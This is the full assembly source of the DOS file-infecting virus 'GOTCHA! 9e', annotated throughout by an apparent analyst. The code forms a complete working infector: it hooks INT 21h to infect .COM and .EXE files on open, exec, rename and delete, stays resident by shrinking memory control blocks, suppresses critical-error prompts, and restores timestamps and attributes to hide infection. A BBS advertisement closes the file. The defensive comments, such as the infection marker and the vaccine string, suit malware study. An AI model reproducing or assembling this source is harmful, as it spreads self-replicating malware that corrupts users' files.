;****************************************************************************
;* GOTCHA! Version 9e
;****************************************************************************
;
; Analyst's reading of this archive copy (comments added; code untouched).
; Syntax is MASM/TASM (segment / assume / org 100h / .RADIX), not NASM as the
; archive labels it. The whole program is one segment with org 100h: it is
; built as a .COM image, and that same image (FILELEN bytes from 'begin') is
; what 'install' copies to the top of memory and 'writeprog' appends to files.

cseg segment
assume cs:cseg,ds:cseg,es:nothing

org 100h

SIGNLEN equ signend - signature ; length of the infection marker ('signature', end of file)
FILELEN equ end - begin ; size of the body that is made resident / appended to victims
RESPAR equ (FILELEN/16) + 17 ; paragraphs 'install' carves off the host's memory block
; (body rounded up to paragraphs, plus 16 paragraphs for the 100h org — inferred from install's 'mov di,0100h')
VERSION equ 9 ; low byte of the answer to the AX=0DADAh "are you there" probe (see do_DADA)
BUFLEN equ 20h ; bytes of the victim's original file start kept in 'buffer'
COMSIGN equ 0 ; values of 'comexe': which kind of file is being infected
EXESIGN equ 1
MINTARGET equ 1000 ; .COM length bounds used by do_com (low word of the length only)
MAXTARGET equ -FILELEN ; as a 16-bit value this is 10000h-FILELEN: host + appended body must fit in 64K

; These equates precede .RADIX 16, so their literals (1000, 16, 17) are read in
; the default radix 10 (MASM evaluates numeric equates where they are defined —
; verify with the assembler actually used). EVERYTHING BELOW is assembled in
; radix 16: bare numbers such as 'int 21', 'mov cx,80', 'mov cl,11' and
; 'add ax,10' mean 21h, 80h, 11h and 10h.
.RADIX 16

;****************************************************************************
;* Start the program!
;****************************************************************************

; Entry point when this image is run on its own as a .COM file (the dropper).
; 'install' addresses the body's variables as cs:[bx+offset x]; BX is the
; "delta" between the assembled offsets and where the body actually sits.
; For the original image that delta is 0.
begin: xor bx,bx
call install
int 20 ; INT 20h (radix 16): terminate — the resident copy, if installed, stays hooked

;****************************************************************************
;* Data
;****************************************************************************

; Per-infection state. All of it lives in the resident copy and is addressed
; with CS overrides from the INT 21h hook.
buffer db BUFLEN dup (?) ; scratch: first the file tail read for the marker check, then the
; victim's first BUFLEN bytes. That saved copy travels with the appended body
; and is what 'entry' restores (.COM) or reads the original CS:IP from (.EXE).
oi21 dw ?,? ; original INT 21h vector (offset, segment), read from the IVT by 'install'
oldlen dw ?,? ; victim's length (low, high word) before the body is appended
nameptr dw ?,? ; far pointer (offset, segment) to the victim's ASCIIZ filename
handle dw ? ; DOS handle of the file currently being infected
comexe db ? ; COMSIGN or EXESIGN for the file currently being infected

;****************************************************************************
;* File-extensions
;****************************************************************************

; Compared (rep cmpsb, 3 bytes) against the characters after the '.' in the
; filename by 'infect'. No other extensions are infected.
EXE_txt db 'EXE'
COM_txt db 'COM'

;****************************************************************************
;* Interupt handler 24
;****************************************************************************

; INT 24h (critical error) handler that 'infect' installs around each attempt.
; Returns AL=3 ("fail the call"), so a write-protected or absent disk turns
; into a failed DOS call instead of the visible Abort/Retry/Fail prompt.
ni24: mov al,03
iret

;****************************************************************************
;* Interupt handler 21
;****************************************************************************

; Resident INT 21h hook. File functions that carry a filename are routed to
; 'infect' first and then chained to the original handler in oi21 with all
; registers and flags restored, so the intercepted call behaves as usual.
;
; What an analyst can observe from the code below:
;  - AX=0DADAh is the "are you there" probe: answered with AX=0A500h+VERSION
;    and never passed on (do_DADA). The same probe is used by 'entry'.
;  - Intercepted functions: 6C00h extended open, 56h rename, 4Eh findfirst,
;    4Bh exec, 43h get/set attributes, 41h delete, 3Dh open (read-only mode
;    only), 17h FCB rename, 13h FCB delete. Reads/writes/seeks (3Fh/40h/42h)
;    are not intercepted, which is also what lets 'infect' use them freely.
ni21: pushf

cmp ax,0DADAh ;install-check ?
je do_DADA

push dx
push cx
push bx
push ax
push si
push di
push ds
push es

cmp ax,6C00h ;open/create 4.00 ? ; full AX compare: only AL=0
je do_6C00
cmp ah,56h ;rename ?
je doit
cmp ah,4Eh ;findfirst ?
je doit ;(only works without wildcards)
cmp ah,4Bh ;load / execute ?
je doit
cmp ah,43h ;attributes
je doit
cmp ah,41h ;delete ?
je doit ;(it might be un-deleted!)
cmp ah,3Dh ;open ?
je do_3D

cmp ah,17h ;FCB-rename?
je doFCB
cmp ah,13h ;FCB-delete?
jne exit

; FCB calls: FCBtoASC rewrites DS:DX to point at an ASCIIZ copy of the name
; built at CS:0000 (the first 100h bytes of the resident segment are unused;
; the body is placed at offset 100h by 'install').
doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's!

doit: call infect ; DS:DX = filename; infect preserves nothing, the pops below do

exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf

; Tail-jump into the original handler: its IRET returns straight to the caller.
jmp dword ptr cs:[oi21] ;call to old int-handler


; AL bits 0-1 = access mode. Anything but 00 (read-only) is passed through
; untouched. This is also why infect's own open with 3D02h does not re-enter
; the hook.
do_3D: test al,03h ;only if opened for READING
jne exit
jmp short doit

do_6C00: test bl,03h ;idem ; BL carries the access mode for function 6Ch
jne exit
mov dx,di ;ptr was DS:DI ; move it to DX where 'infect' expects it
jmp short doit

; Only AX changes on this path; flags go back exactly as they came in.
do_DADA: mov ax,0A500h+VERSION ;return a signature
popf
iret

;****************************************************************************
;* Old Interupt handler 21
;****************************************************************************

; Calls the ORIGINAL INT 21h (pushf + far call through oi21), bypassing the
; hook. Used for the 4300h/4301h attribute calls in 'infect' and 'setattr':
; function 43h is intercepted by ni21, so going through INT 21h for it would
; re-enter 'infect'.
org21: pushf
call dword ptr cs:[oi21] ;call to old int-handler
ret

;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************

; Called from the INT 21h hook with DS:DX = filename of the intercepted call.
; Sequence as written: environment "vaccine" check -> filename filters ->
; extension check -> suppress Ctrl-Break and INT 24h -> drop attribute bits ->
; open read/write -> save date/time -> marker check at EOF -> save first
; BUFLEN bytes -> append body -> patch the file start -> restore everything.
;
; Exits and stack discipline (matters when reading the jumps):
;   return   - before anything is pushed.
;   return1  - after the ctrl-break flag, INT 24h vector (2 words) and the
;              attributes were pushed; undoes those four pushes.
;   return2  - additionally pops the date/time pair and closes the handle.
;
; Defender-relevant facts visible here: the file's date/time and attributes
; are put back afterwards, so timestamp- or attribute-based change detection
; will not notice an infection; the file grows by FILELEN bytes and ends with
; the SIGNLEN-byte marker 'GOTCHA!',0, which is the reliable indicator.
infect: cld

mov cs:[nameptr],dx ;save the ptr to the filename
mov cs:[nameptr+2],ds

; Inoculation check. The environment of the CALLING process (its PSP:2Ch) is
; scanned; if any entry equals 'envstring' byte for byte, the file is left
; alone. Setting that variable is the author's built-in off-switch and works
; as a system-level vaccine.
mov ah,62h ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov ax,ds:002Ch
mov ds,ax
mov si,0

envloop: cmp ds:[si],byte ptr 0 ;end of environment? ; a second 0 ends the block
je verder7

push cs
pop es
mov di,offset envstring
mov bx,0

; BX counts mismatching bytes while walking to the end of this entry (the
; terminating 0 is compared as well, so only an exact match leaves BX = 0).
scloop: mov al,ds:[si] ;check the current env-item
cmpsb
je scv1
inc bx ;characters don't match!
scv1: cmp al,0 ;end of env-item?
jne scloop

cmp bx,0 ;did all characters match?
je return
jmp short envloop

; Filename filters. First locate the '.' (BX -> the extension) and the start
; of the base name (after the last '\' within 11h = 17 bytes, else the start
; of the string).
verder7: push cs ;check the filename
pop ds
les di,dword ptr [nameptr]
mov dx,di
mov cx,80 ;search end of filename (-EXT) ; 80h bytes (radix 16); no check that a '.' was found
mov al,'.'
repnz scasb
mov bx,di

std ;find begin of filename
mov cl,11
mov al,'\'
repnz scasb
cld ; ZF from scasb survives cld
je vvv
mov di,dx
jmp short vvv2
vvv: add di,2 ; DF was set, so DI stopped one byte before the '\': +2 = first char of the name
; Names starting with 'V', or containing "AN" in their first 7 positions, are
; skipped. The page gives no reason; presumably to avoid tools with such names.
vvv2: mov al,'V' ;is it V*.* ?
scasb
je return

; 'NA' in AX is stored little-endian, so scasw matches memory order "A","N".
; dec/scasw slides the 2-byte window one character at a time; loopnz leaves
; ZF from the last scasw for the je below.
mov cl,7 ;is it *AN*.* ?
mov ax,'NA'
ANloop: dec di
scasw
loopnz ANloop
je return

mov si,offset EXE_txt ;is extension 'EXE'?
mov di,bx
mov cx,3
rep cmpsb
jnz verder4

mov byte ptr [comexe],EXESIGN
jmp short verder3

return: ret ; shared early exit, reachable only before anything is pushed

verder4: mov si,offset COM_txt ;is extension 'COM'?
mov di,bx
mov cx,3
rep cmpsb
jnz return

mov byte ptr [comexe],COMSIGN

; From here on the environment is quietened: Ctrl-Break checking off, INT 24h
; replaced by ni24. Both are restored at return1.
verder3: mov ax,3300h ;get ctrl-break flag
int 21
push dx ; DL = current flag

xor dl,dl ;clear the flag
mov ax,3301h
int 21

mov ax,3524h ;get int24 vector
int 21
push bx ; ES:BX = old INT 24h handler
push es

push cs ;set int24 vec to new handler
pop ds
mov dx,offset ni24
mov ax,2524h
int 21

lds dx,dword ptr [nameptr] ;get file-attribute
mov ax,4300h
call org21 ; via the original handler: 43h is hooked
push cx ; original attributes, restored at return1

; 0F8h keeps bits 3-7: this clears read-only, hidden AND system (bits 0-2),
; not just the read-only bit the comment mentions.
and cx,0F8h ;clear READ-ONLY-flag
call setattr
jc return1_v

; Open read/write. This goes through the hooked INT 21h, but mode 02h fails
; do_3D's read-only test, so the hook just chains it.
push cs ;open the file
pop ds
lds dx,dword ptr [nameptr]
mov ax,3D02h
int 21
jnc verder2
return1_v: jmp return1 ;something went wrong... :-(

verder2: push cs ;save handle
pop ds
mov [handle],ax

mov bx,[handle] ;get file date & time
mov ax,5700h
int 21
push cx ; time
push dx ; date — both written back at return2

call endptr ;get file-length ; seek to end: DX:AX = length
mov [oldlen],ax
mov [oldlen+2],dx

; Re-infection check: seek to length-SIGNLEN (absolute, AL=0) and compare the
; tail with 'signature'. Files shorter than SIGNLEN are not special-cased.
sub ax,SIGNLEN ;move ptr to end - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov

mov cx,SIGNLEN ;read the last bytes
mov dx,offset buffer
call flread
jc return2_v

push cs ;compare bytes with signature
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
jz return2_v ; marker present: already infected

; Keep the victim's first BUFLEN bytes in 'buffer'. They are appended to the
; file as part of the body (writeprog copies 'begin'..'end', buffer included)
; before 'buffer' is patched below, which is how 'entry' later finds them.
; The read's CF is not checked here.
call beginptr ;read begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flread

cmp byte ptr [comexe],EXESIGN
jz do_exe

; .COM: only the low word of the length is consulted. Skip if the host plus
; the body would not fit in 64K, or if the file is <= MINTARGET bytes.
do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file
jnb return2
cmp word ptr [oldlen],MINTARGET
jbe return2

call writeprog ;write program to end of file
jc return2

; 3-byte JMP rel16 at 100h. Body loads at 100h+oldlen with org 100h, so the
; entry label sits at oldlen+entry; the displacement is relative to 103h.
mov ax,[oldlen] ;calculate new start-adres
add ax,(offset entry - 0103h)
mov byte ptr [buffer],0E9h ;'JMP'
mov word ptr [buffer+1],ax

jmp short verder1

return2_v: jmp short return2


do_exe: call writeprog ;write program to end of file
jc return2

; New length = oldlen + FILELEN, as a dword.
mov ax,[oldlen] ;calculate new length
mov dx,[oldlen+2]
add ax,FILELEN
adc dx,0

; MZ header fields in the saved copy: +2 = bytes in last 512-byte page,
; +4 = number of pages (length/512, then +1 unconditionally — appears to
; over-count by one page when the length is an exact multiple of 512; left
; as-is), +8 = header size in paragraphs, +14h = e_ip, +16h = e_cs.
; The header fields not touched here (e_ss/e_sp, relocations) stay valid.
mov cl,9 ;put new length in header
shr ax,cl
mov cl,7
shl dx,cl
or ax,dx
inc ax
mov word ptr [buffer+4],ax
mov ax,[oldlen]
add ax,FILELEN
and ax,01FFh
mov word ptr [buffer+2],ax

; New CS = (oldlen / 16) - header paragraphs: the body starts at file offset
; oldlen, and e_cs is relative to the end of the header.
; New IP = (oldlen mod 16) + (entry - 100h): 'entry' offset within the body.
mov ax,[oldlen] ;calculate new CS & IP
mov dx,[oldlen+2]
mov bx,word ptr [buffer+8]
push ax
mov cl,4
shr ax,cl
mov cl,0Ch
shl dx,cl
add ax,dx
sub ax,bx
mov word ptr [buffer+16h],ax ;put CS in header
pop ax
and ax,000Fh
add ax,(offset entry - 0100h)
mov word ptr [buffer+14h],ax ;put IP in header

; Overwrite the first BUFLEN bytes of the file with the patched copy.
verder1: call beginptr ;write new begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flwrite

return2: mov bx,[handle] ;restore file date & time
pop dx
pop cx
mov ax,5701h
int 21

mov bx,[handle] ;close the file
mov ah,3Eh
int 21

return1: pop cx ;restore file-attribute
call setattr

pop ds ;restore int24 vector ; ES:BX saved above -> DS:DX here
pop dx
mov ax,2524h
int 21

pop dx ;restore ctrl-break flag
mov ax,3301h
int 21

ret

;****************************************************************************
;* Gets ASCIIZ-filename from FCB
;****************************************************************************

; Converts the FCB at DS:DX into an ASCIIZ name at CS:0000 and returns with
; DS:DX pointing at it, so the hook can hand FCB calls to 'infect' like
; handle-based ones. The drive byte is dropped (normal and extended FCB),
; spaces in the 8-character name are skipped, the 3-character extension is
; copied verbatim (trailing spaces included — 'infect' only compares 3 bytes).
FCBtoASC: mov si,dx
lodsb ; first FCB byte; 0FFh marks an extended FCB
inc al ;extended FCB?
jne normal_FCB
add si,7 ; skip the 5 reserved bytes, attribute byte and drive byte to reach the name
normal_FCB: push cs
pop es
xor di,di ;adres for ASCIIZ-name ; CS:0000 — below the body, which 'install' places at offset 100h
mov dx,di
mov cx,8
FCB_loop: lodsb ;copy all except spaces
cmp al,' '
je FCB_verder
stosb
FCB_verder: loop FCB_loop
mov al,'.' ;append a '.'
stosb
mov cl,3 ;and the extension
rep movsb
xchg ax,cx ;and a final zero. ; CX is 0 after rep movsb, so AL becomes 0
stosb
push es ; DS:DX = CS:0000 on return
pop ds
ret

;****************************************************************************
;* Changes file-attributes
;****************************************************************************

; Sets the attributes of the file at cs:[nameptr] to CX (caller supplies CX).
; Returns CF/AX from DOS. Goes through 'org21' because function 43h is
; intercepted by the hook itself.
setattr: lds dx,dword ptr cs:[nameptr]
mov ax,4301h
call org21
ret

;****************************************************************************
;* Writes program to end of file
;****************************************************************************

; Appends the FILELEN-byte body ('begin'..'end', including the current
; contents of 'buffer') to the open file. Seeks to EOF, sets CX/DX, and then
; FALLS THROUGH into 'flwrite' below — the call/ret are commented out on
; purpose, so flwrite's ret returns to writeprog's caller with CF/AX from the
; write. 'flwrite' must stay immediately after this routine.
writeprog: call endptr
mov cx,FILELEN
mov dx,offset begin
; call flwrite ;Hmm, save a few bytes!
; ret

;****************************************************************************
;* Subroutines for reading/writing
;****************************************************************************

; flwrite / flread: DOS 40h / 3Fh on cs:[handle], CX bytes at CS:DX.
; CF set on error, AX = bytes transferred or the error code (DOS convention).
; Both go through the hooked INT 21h, which does not intercept 3Fh/40h.
; Note: 'writeprog' falls through into flwrite (see above).
flwrite: mov ah,40h
jmp short flvrdr

flread: mov ah,3Fh
flvrdr: push cs
pop ds
mov bx,cs:[handle]
int 21
ret

;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************

; Three entry points into one DOS 42h (lseek) call on cs:[handle]:
;   beginptr - offset 0 from the start (AL=0).
;   endptr   - offset 0 from the end (AL=2); DX:AX on return is the file
;              length, which is how 'infect' measures the file.
;   ptrmov   - caller has already set AL (origin) and CX:DX (offset); used by
;              'infect' to seek to length-SIGNLEN.
beginptr: mov al,00h ;go to begin of file
jmp short ptrvrdr

endptr: mov al,02h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx

ptrmov: mov bx,cs:[handle] ;go somewhere
mov ah,42h
int 21
ret

;****************************************************************************
;* This is where infected files start
;****************************************************************************

; Entry point inside an INFECTED file: reached through the patched JMP (.COM)
; or the patched e_cs/e_ip (.EXE). Steps: compute the delta of this copy,
; build an IRET frame that resumes the host, install the resident copy unless
; the "are you there" probe says one is present, then IRET into the host.
; Note that no general registers are restored for the host (AX is clobbered).
entry: call entry2
entry2: pop bx ; BX = runtime offset of entry2
sub bx,offset entry2 ;CS:BX is begin program - 100h ; minus its assembled offset = delta for cs:[bx+offset x]

pushf ; flags half of the IRET frame; CS and IP are pushed below
cld

cmp byte ptr cs:[bx+offset comexe],COMSIGN
jz entryC

; .EXE host: the original e_cs/e_ip survive in the appended copy of 'buffer'
; (header offsets 16h/14h). e_cs is relocated by the load segment, which is
; the PSP segment (DS at EXE entry) plus 10h paragraphs for the PSP itself.
entryE: mov ax,ds ;put old start-adres on stack
add ax,10 ; 10h (radix 16) = 256-byte PSP
add ax,cs:[bx+offset buffer+016h]
push ax
push cs:[bx+offset buffer+014h]

jmp short entcheck

; .COM host: copy the saved original first BUFLEN bytes back over the JMP at
; 100h and resume at CS:0100h. DS=ES=CS for a .COM, which rep movsb relies on.
entryC: mov ax,bx ;restore old file-begin
add ax,offset buffer
mov si,ax
mov di,0100 ; 100h (radix 16)
mov cx,BUFLEN
rep movsb

push cs ;put old start-adres on stack
mov ax,0100h
push ax

; Resident check: the hook answers AH=0A5h (see do_DADA); nothing else does.
entcheck: mov ax,0DADAh ;already installed?
int 21h
cmp ah,0A5h
je entstop

call install ;install the program ; BX still holds the delta 'install' needs

entstop: iret ; pops IP, CS, flags pushed above -> host's original entry point

;****************************************************************************
;* Install the program at top of memory
;****************************************************************************

; Makes the body resident at the top of the current program's memory block
; and hooks INT 21h. Expects BX = delta (0 from 'begin', computed by 'entry'
; in an infected file) and DS = PSP segment (DOS sets DS to the PSP at both
; .COM and .EXE entry). Preserves DS/ES.
;
; What is observable: the INT 21h vector is read straight from the IVT
; (0000:0084h/0086h) rather than via function 35h, and set via 25h; memory is
; obtained by shrinking the program's own MCB — which must be the last block
; ('Z' = 5Ah) — by RESPAR paragraphs and lowering the PSP's top-of-memory word.
; The resident copy gets no MCB of its own, so a memory listing shows only a
; slightly smaller total rather than a separate block; after install the INT
; 21h vector points into that region (segment = new top of memory, offset ni21).
install: push ds
push es

xor ax,ax ;get original int21 vector
mov es,ax
mov cx,word ptr es:0084h ; IVT slot 21h: offset
mov dx,word ptr es:0086h ; segment
mov cs:[bx+offset oi21],cx
mov cs:[bx+offset oi21+2],dx

mov ax,ds ;adjust memory-size
dec ax ; the MCB is the paragraph just below the PSP
mov es,ax
cmp byte ptr es:[0000h],5Ah ; only if this is the last block in the chain
jnz cancel
mov ax,es:[0003h] ; block size in paragraphs
sub ax,RESPAR
jb cancel ; too small: no hook, no resident copy
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR ; MCB:0012h = PSP:0002h (top of memory), lowered by the same amount

push cs ;copy program to top
pop ds
mov es,es:[0012h] ; ES = segment of the carved-off region
mov ax,bx
add ax,0100 ; 100h (radix 16): source = this copy's 'begin'
mov si,ax
mov di,0100h ; destination keeps the org 100h layout
mov cx,FILELEN
rep movsb

mov dx,offset ni21 ;set vector to new handler
push es
pop ds
mov ax,2521h ; INT 21h -> resident copy's ni21
int 21h

cancel: pop es
pop ds

ret

;****************************************************************************
;* Text and Signature
;****************************************************************************

; Inoculation string: 'infect' compares every environment entry of the
; calling process against this, byte for byte, and leaves the file alone on a
; match. The '<6D>' is an encoding artefact of this archive copy; the intended
; character cannot be recovered from this page.
envstring: db 'E=mc<6D>',0 ;put this in your environment!

; Infection marker: the last SIGNLEN bytes of every infected file. 'infect'
; checks for it before infecting (no re-infection); a scanner can look for the
; same 8-byte tail in .COM/.EXE files.
signature: db 'GOTCHA!',0 ;I have got you! :-)
signend:

; FILELEN = end - begin: everything from 'begin' to here is the body that is
; made resident and appended to victims.
; NOTE(review): 'end' is also the assembler's END directive; this label name
; assembled only if the assembler used accepted it — not verified here.
end:

cseg ends
end begin ; entry point when run as the dropper

; ----------------------------------------------------------------------------
; ---> and Remember Don't Forget to Call <---
; ---> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <---
; ----------------------------------------------------------------------------